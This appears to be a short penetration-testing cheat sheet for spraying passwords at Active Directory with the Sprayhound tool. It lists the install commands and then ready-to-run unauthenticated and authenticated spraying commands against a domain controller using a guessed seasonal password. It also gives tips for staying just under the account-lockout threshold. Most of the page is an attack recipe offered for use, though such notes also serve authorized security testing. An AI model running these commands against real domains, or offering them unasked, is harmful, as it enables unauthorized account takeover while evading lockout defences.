Active Directory Password Spraying

Install Sprayhound

# Kali Linux
sudo apt install sprayhound -y

# Non-Kali
pipx install git+https://github.com/Hackndo/sprayhound.git

Run (Unauthenticated)

sprayhound -U userlist.txt -d $ADDOMAIN -dc $ADCONTROLLER -p 'Summer2024'

Be careful not to lockout accounts! Unauthenticated has no checks for bad password count!

Run (Authenticated)

sprayhound -U userlist.txt -lu $ADUSER -lp $(PSWPRMPT) -t 2 -d $ADDOMAIN -dc $ADCONTROLLER -p 'Summer2024';PSW=""

-t 2 is used to stop the guessing when you are two attempts away from the lockout

Note that the lockout count will only reset with a valid login even if there is a rule allow more failed attempts after a certain amount of time. Therefore, this doesn't allow you to spay at max frequency.

Last updated